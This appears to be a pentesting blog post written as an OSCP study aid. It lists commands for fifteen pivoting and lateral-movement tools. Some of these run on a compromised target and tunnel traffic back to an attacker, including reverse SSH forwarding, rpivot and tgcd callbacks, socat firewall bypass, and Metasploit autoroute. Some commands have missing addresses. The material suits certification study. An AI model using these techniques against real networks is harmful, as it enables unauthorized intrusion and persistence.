🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement

Learn several techniques to succeed in your post-exploitation phase!

#1: Pivoting with rinetd

rinetd -f -c rinetd.conf
# rinetd.conf

# bindaddress bindport connectaddress connectport
$PUBLICIP        80          $IP          80

#2: Pivoting with plink.exe

ssh for windows: plink.exe

plink -l root -pw pass -R 3389: $IP -P 80 -N

#3: Pivoting with SSH / OpenSSH

ssh local port forwarding (“proxy”, on the attacker machine)

Local port → Remote server

ssh -L <localhost port>:<remote IP>:<remote port> $IP

Remote redirection (ssh remote port forwarding (“reverse shell”, on a compromised machine))

ssh -R <server side port>:<localhost>:<local port> $IP

with ssh -L / -R local mapped ports are always mapped to to map them to eth0/tun0 ifaces, use tgcd or socat!

Open question: How to forward local apache in attacker machine to private LAN network through pivoting?

Dynamic port forwarding (socks4/5 proxy)


Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.

#4: Pivoting with VPN over SSH

# /etc/ssh/sshd_config

PermitRootLogin yes
PermitTunnel yes
ssh user@server -w any:any

Routing not automatic, add routes and gateway. Also on server, ip forwarding

#5: Pivoting with proxychains

From compromised machine (hax0r user)

ssh -f -N -R 2222: root@kali
ssh -f -N -D -p 2222 [email protected]

Edit /etc/proxychains.conf

socks4   8080

proxychains only allows TCP connect traffic!!!! And incredibly slow!

proxychains nmap --top-ports=20 -sT -Pn $IP/24

For proxying DNS change /usr/lib/proxychains3/proxyresolv

#6: Pivoting with FreeSSHd.exe

Good to install on target for pivoting!!

Download from here: http://www.freesshd.com/freeSSHd.exe

#7: Pivoting with tinyproxy


#8: Pivoting with rpivot

  • Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy

  • Server should be started on pentester’s machine and listen to incoming connections from the client.

  • Python but no dependencies

Pentester machine (listener):

python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP

Target machine (if egress traffic not firewalled)

python client.py --server-ip $IP --server-port 9900

#9: Pivoting with 3proxy

On target:
(Can bypass target sshd tcp forwarding restrictions)

For SOCKS proxy:

# 3proxy.config

socks -p1080 # socks proxy

For port redirection:

# 3proxy.config

tcppm <localport> <targethost> <targetport>


./3proxy 3proxy.config &

#10: Pivoting with tgcd

tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls. This can also be used by network analysts and security experts for penetration testing and analyze the security of their network.

This program has 3 different modes:

  • CC (ConnectConnect)

  • LL (ListenListen)

  • PF (PortForwarder)

CC and LL nodes are used together to provide access to a service inside a Local Area Network to the external network. PF node is, however, only a simple port forwarder.

On attacker (Do not support VPN):

tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10

On target:

tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10

#11: Pivoting with Metasploit

Method 1: Using Socks

msf> use auxiliary/server/socks4a
msf> run -j

Method 2: Using autoroute

meterpreter> run autoroute -s $IP/24
meterpreter > run autoroute -p

Method 3: Manual route

msf exploit(handler) > route add $IP 1

#12: Pivoting with ssf

On the target:

ssfd -p 11111

On the attacker machine:

ssf -D 22222 -p 11111 $TARGET_IP

#13: Pivoting with socat


On inside LAN server:

socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80

On outside LAN client:

socat -d -d -d tcp-l:80,reuseaddr,bind=,fork tcp-l:80,bind=$IP,reuseaddr,retry=10

Connect with outside client:

  • Socat SSH encapsulation into SSL

On server:

socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'

on client:

ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080" $SERVER
  • Socat SSH deception (Bounds back to the client ssh server)

socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"


#14: sshuttle

Sshutle is where transparent proxy meets VPN meets ssh. It can be download from https://github.com/sshuttle/sshuttle

You must have root access on the local machine, but you can have a normal account on the server.

sshuttle -r [email protected]

Where is a machine inside our current network where there is a ssh server that we log in with the user pivotmachine, and is the network we are redirecting from the ssh server machine to ours.

More info for sshuttle: https://sshuttle.readthedocs.io/en/stable/manpage.html

#15: pwncat

pwncat is a netcat on steroids mainly used for reverse and bind shells.

Nonetheless, it can be also used for pivoting in a syntax similar to ssh:

Local port forward (forward remote port 3306 to local port 5050):

pwncat -L example.org 3306

Connect to a remote MySQL server (remote port 3306) and then connect to another pwncat/netcat server on and bridge traffic:

pwncat -R example.org 3306

Reference: https://github.com/cytopia/pwncat






Leave a Reply

Your email address will not be published. Required fields are marked *